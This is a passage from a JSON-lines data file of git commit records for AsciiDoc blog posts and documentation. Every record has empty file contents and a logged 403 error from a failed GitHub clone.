doc\n","repos":"josefkarasek\/application-templates,bparees\/application-templates,knrc\/application-templates,errantepiphany\/application-templates,kyguy\/application-templates,douglaspalmer\/application-templates,bdecoste\/application-templates,jboss-openshift\/application-templates,rcernich\/application-templates","old_file":"docs\/secrets\/processserver-app-secret.adoc","new_file":"docs\/secrets\/processserver-app-secret.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"968df133e19d63c4b1ef994b14ec4a04f133989a","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c7749d60e83e19a662af86cce40275dade6013f","subject":"y2b create post The Best Wireless Headphones You Can Buy Right Now","message":"y2b create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-02-TheBestWirelessHeadphonesYouCanBuyRightNow.adoc","new_file":"_posts\/2018-02-02-TheBestWirelessHeadphonesYouCanBuyRightNow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e04cde7f89bc108ffe46d3d50a445caec80a51c5","subject":"Draft of preprocess post","message":"Draft of preprocess post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-xx-js-preprocessing-improvements.adoc","new_file":"content\/news\/2017-07-xx-js-preprocessing-improvements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c285583e6300c55d44590bd53db74890593ceed2","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a53adc33c6b0131206ac51490ac70d708c18220","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9ceecf18cddfd913b147dd22adcb2fb6569600c","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 
2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4aac06926dccd040d1dd59feeeafbfc944dcaf28","subject":"Delete the file at '_posts\/2017-05-30-Java-Classes.adoc'","message":"Delete the file at '_posts\/2017-05-30-Java-Classes.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-30-Java-Classes.adoc","new_file":"_posts\/2017-05-30-Java-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19098c57cbbfb02f42e3c6d7de5ff1dbc9fff5ee","subject":"Update 2016-03-17-J-V-M-Option.adoc","message":"Update 2016-03-17-J-V-M-Option.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-17-J-V-M-Option.adoc","new_file":"_posts\/2016-03-17-J-V-M-Option.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bb40c19fdf2bdac8fe41a8b6bb566b756a25a81","subject":"Update 2016-04-24-Post-2-Title.adoc","message":"Update 2016-04-24-Post-2-Title.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-24-Post-2-Title.adoc","new_file":"_posts\/2016-04-24-Post-2-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11b4da1b58c6332c4c02cf8b052c0a62f5982648","subject":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"594eb5d21edb8092604ffeecbc394e54928713f2","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 
2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb81f70072d6d20323375818e7be9aa058f228d3","subject":"Update 2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","message":"Update 2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","new_file":"_posts\/2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f53371679f125c335d6a00658d49765d4c87f3de","subject":"nitrite explorer readme added","message":"nitrite explorer readme added\n","repos":"dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database","old_file":"nitrite-explorer\/README.adoc","new_file":"nitrite-explorer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dizitart\/nitrite-database.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1fcf779fbea14dbe986f780c74be4bdbd06762f","subject":"Update 2016-10-16-communicating-between-components-in-react-native.adoc","message":"Update 2016-10-16-communicating-between-components-in-react-native.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-16-communicating-between-components-in-react-native.adoc","new_file":"_posts\/2016-10-16-communicating-between-components-in-react-native.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caef7d4e396be1c9a3757657ff97ce77fd2c9734","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceb1253f77f0c539bac4dfb7dff9f5e2c1350fed","subject":"Update 2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","message":"Update 
2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","new_file":"_posts\/2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07e9d8405f4b1b01fb04c5f9b46bc5334ec40d32","subject":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"836c0a7563fa0333d46f5c3ea71c00f0bc4e1900","subject":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","message":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"501be9a5cd16f8872e3875aab5c0561f07be40e7","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/joke_is_on_us.adoc","new_file":"content\/writings\/joke_is_on_us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5768254dc79eaf95cea32c723c546c88ab8e7872","subject":"y2b create post Motorola Xoom Unboxing \\u0026 Overview","message":"y2b create post Motorola Xoom Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-28-Motorola-Xoom-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-03-28-Motorola-Xoom-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f03273be79289e0f81e079fd65c4f9d36f344e1d","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 
2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8977a0f90da75997efb43683d17b10a928c85d87","subject":"y2b create post Marvel Cinematic Universe: Phase One Unboxing \\u0026 Overview","message":"y2b create post Marvel Cinematic Universe: Phase One Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-03-Marvel-Cinematic-Universe-Phase-One-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-03-Marvel-Cinematic-Universe-Phase-One-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7fa5edf2cf8492d19e35f85ef3f6b3f8b067bb9","subject":"Update 2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","message":"Update 2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","new_file":"_posts\/2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac79a0bad890a8e9d9a6f09ecb93b9a52feed01c","subject":"Update Scala: Use Option or Either to replace null as a failure indicator.asciidoc","message":"Update Scala: Use Option or Either to replace null as a failure indicator.asciidoc","repos":"lancegatlin\/techblog,lancegatlin\/techblog","old_file":"posts\/Scala: Use Option or Either to replace null as a failure indicator.asciidoc","new_file":"posts\/Scala: Use Option or Either to replace null as a failure indicator.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lancegatlin\/techblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d1a9b6baa9eb32feb11e52a1225a014028feeb1","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"818f2355cf337907c0180045165887d5e8507c72","subject":"finalising your submission","message":"finalising your 
submission\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f13d1ef49703eca1cac5221b3aea9991ee849e9","subject":"Update ipython_post_setup.adoc","message":"Update ipython_post_setup.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_post_setup.adoc","new_file":"docs\/ipython_post_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf141a3fd18e523e7c32edb0992e2751077e38d2","subject":"[docs] add warning for read-write indices in force merge documentation (#28869)","message":"[docs] add warning for read-write indices in force merge documentation (#28869)\n\n","repos":"gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/indices\/forcemerge.asciidoc","new_file":"docs\/reference\/indices\/forcemerge.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cca153e986f4ede41c5cca7a24fc0784be9f59f4","subject":"Document how to return custom JSON on errors","message":"Document how to return custom JSON on errors\n\nCloses 
gh-3999\n","repos":"RichardCSantana\/spring-boot,bbrouwer\/spring-boot,lucassaldanha\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,donhuvy\/spring-boot,dfa1\/spring-boot,bclozel\/spring-boot,joansmith\/spring-boot,lenicliu\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,qerub\/spring-boot,chrylis\/spring-boot,srikalyan\/spring-boot,pvorb\/spring-boot,RichardCSantana\/spring-boot,lexandro\/spring-boot,joshiste\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,habuma\/spring-boot,hello2009chen\/spring-boot,jayarampradhan\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,hqrt\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,srikalyan\/spring-boot,lenicliu\/spring-boot,lburgazzoli\/spring-boot,jmnarloch\/spring-boot,eddumelendez\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,tiarebalbi\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,Nowheresly\/spring-boot,bclozel\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,akmaharshi\/jenkins,mbenson\/spring-boot,joshiste\/spring-boot,zhangshuangquan\/spring-root,Buzzardo\/spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,habuma\/spring-boot,mrumpf\/spring-boot,afroje-reshma\/spring-boot-sample,philwebb\/spring-boot,mbenson\/spring-boot,joansmith\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,deki\/spring-boot,pvorb\/spring-boot,vpavic\/spring-boot,sebastiankirsch\/spring-boot,aahlenst\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,ollie314\/spring-boot,hqrt\/jenkins2-course-spring-boot,drumonii\/spring-boot,jbovet\/spring-boot,tsachev\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,candrews\/spring-boot,lenicliu\/spring-boot,zhangshuangquan\/spring-root,vpavic\/spring-boot,aahlenst\/spring-boot,xiaoleiPENG\/my-project,spring-projects\/spring-boot,jxblum\/spring-boot,ilayaperumalg\/spring-boot,jbovet\/spring-boot,izeye\/spring-boot,wilkinsona\/spring-boot,minmay\/spring-boot,yhj630520\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,izeye\/spring-boot,yangdd1205\/spring-boot,herau\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,jmnarloch\/spring-boot,linead\/spring-boot,bclozel\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,srikalyan\/spring-boot,donhuvy\/spring-boot,ollie314\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,javyzheng\/spring-boot,neo4j-contrib\/spring-boot,qerub\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,jbovet\/spring-boot,jbovet\/spring-boot,RichardCSantana\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,felipeg48\/spring-boot,dfa1\/spring-boot,rweisleder\/spring-boot,ameraljovic\/spring-boot,srikalyan\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,neo4j-contrib\/spring-boot,i007422\/jenkins2-course-spring-boot,dreis2211\/spring-boot,srikalyan\/spring-boot,rweisleder\/spring-boot,sbuettner\/spring-boot,neo4j-contrib
\/spring-boot,herau\/spring-boot,mbenson\/spring-boot,bbrouwer\/spring-boot,ameraljovic\/spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,mdeinum\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,lenicliu\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,sbuettner\/spring-boot,isopov\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,qerub\/spring-boot,royclarkson\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,royclarkson\/spring-boot,jbovet\/spring-boot,ihoneymon\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,michael-simons\/spring-boot,nebhale\/spring-boot,ilayaperumalg\/spring-boot,sbuettner\/spring-boot,herau\/spring-boot,hello2009chen\/spring-boot,wilkinsona\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,kamilszymanski\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,jayarampradhan\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,akmaharshi\/jenkins,kamilszymanski\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,thomasdarimont\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,scottfrederick\/spring-boot,RichardCSantana\/spring-boot,brettwooldridge\/spring-boot,ameraljovic\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joansmith\/spring-boot,mbogoevici\/spring-boot,mbenson\/spring-boot,jayarampradhan\/spring-boot,joansmith\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,hqrt\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,bjornlindstrom\/spring-boot,candrews\/spring-boot,olivergierke\/spring-boot,akmaharshi\/jenkins,tsachev\/spring-boot,zhanhb\/spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,drumonii\/spring-boot,ollie314\/spring-boot,akmaharshi\/jenkins,pvorb\/spring-boot,sebastiankirsch\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,michael-simons\/spring-boot,tsachev\/spring-boot,chrylis\/spring-boot,afroje-reshma\/spring-boot-sample,bijukunjummen\/spring-boot,philwebb\/spring-boot,jmnarloch\/spring-boot,philwebb\/spring-boot-concourse,ptahchiev\/spring-boot,bbrouwer\/spring-boot,kdvolder\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,lexandro\/spring-boot,Nowheresly\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jvz\/spring-boot,htynkn\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,joshthornhill\/spring-boot,dfa1\/spring-boot,isopov\/spring-boot,RichardCSantana\/spring-boot,eddumelendez\/spring-boot,bijukunjummen\/spring-boot,philwebb\/spring-boot,shangyi0102\/spring-boot,yhj630520\/spring-boot,Nowheresly\/spring-boot,wilkinsona\/spring-boot,sbuettner\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,olivergierke\/spring-boot,jayarampradhan\/spring-boot,lburgazzoli\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-sprin
g-boot,mbogoevici\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,mrumpf\/spring-boot,ilayaperumalg\/spring-boot,joansmith\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,sbcoba\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,sbcoba\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,lucassaldanha\/spring-boot,shakuzen\/spring-boot,ihoneymon\/spring-boot,NetoDevel\/spring-boot,dreis2211\/spring-boot,jmnarloch\/spring-boot,linead\/spring-boot,NetoDevel\/spring-boot,izeye\/spring-boot,hello2009chen\/spring-boot,Nowheresly\/spring-boot,lexandro\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,dfa1\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,linead\/spring-boot,Buzzardo\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,bijukunjummen\/spring-boot,zhanhb\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,felipeg48\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,dreis2211\/spring-boot,ollie314\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,qerub\/spring-boot,joshthornhill\/spring-boot,afroje-reshma\/spring-boot-sample,tiarebalbi\/spring-boot,dreis2211\/spring-boot,afroje-reshma\/spring-boot-sample,donhuvy\/spring-boot,jmnarloch\/spring-boot,mosoft521\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,qerub\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,hqrt\